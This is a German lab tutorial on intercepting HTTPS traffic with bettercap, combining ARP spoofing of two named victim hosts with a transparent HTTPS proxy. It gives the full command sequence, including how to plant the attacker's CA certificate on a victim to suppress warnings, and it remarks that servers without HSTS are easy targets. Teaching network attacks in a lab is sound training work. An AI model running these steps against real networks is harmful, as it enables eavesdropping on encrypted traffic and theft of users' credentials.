HTTPS MITM mit bettercap

Eine HTTPS MITM Attacke erlaubt es den verschlüsselten HTTPS-Traffic zwischen Opfer und Server mitzulesen. bettercap kombiniert dazu ARP Spoofing mit einem transparenten HTTPS Proxy.

Umgebung

KALI    = 192.168.16.101  (Angreifer)
ALICE   = 192.168.16.131  (Opfer 1)
BOB     = 192.168.16.132  (Opfer 2)

Voraussetzung

IP-Forwarding auf Kali aktivieren

echo 1 > /proc/sys/net/ipv4/ip_forward

Angreifer - bettercap starten

sudo bettercap -iface eth0

In der bettercap-Konsole

ARP MITM + HTTPS Proxy kombiniert

set arp.spoof.targets 192.168.16.131,192.168.16.132
set arp.spoof.internal true
set arp.spoof.fullduplex true
arp.spoof on
https.proxy on
net.sniff on

Optionen https.proxy

Hilfe anzeigen

help https.proxy

• https.proxy.address → Bind-Adresse des Proxy (default=0.0.0.0)
• https.proxy.port → Port des Proxy (default=8083)
• https.proxy.certificate → Pfad zum CA-Zertifikat
• https.proxy.key → Pfad zum CA-Key
• https.proxy.script → Javascript für Manipulation der Requests

Zertifikat

bettercap generiert automatisch ein selbstsigniertes CA-Zertifikat

Der Browser des Opfers zeigt eine Zertifikatswarnung

Zertifikat liegt unter

~/.bettercap-ca.cert.pem

Auf dem Opfer installieren um Warnung zu unterdrücken (Labor)

sudo cp ~/.bettercap-ca.cert.pem /usr/local/share/ca-certificates/bettercap.crt
sudo update-ca-certificates

Test auf Alice

HTTPS-Seite aufrufen

curl -k https://xinux.de

Auf Kali sollte der Traffic im net.sniff sichtbar sein

Hinweis

• Moderne Browser mit HSTS (HTTP Strict Transport Security) blockieren diesen Angriff
• HSTS Preload Domains (google.com, facebook.com etc.) sind nicht angreifbar
• Funktioniert gut gegen interne Webserver ohne HSTS

Mögliche Folgeangriffe

• Web Spoofing mit bettercap
• DNS Spoofing mit bettercap
• mitmproxy

Siehe auch

• ARP Spoofing mit bettercap
• bettercap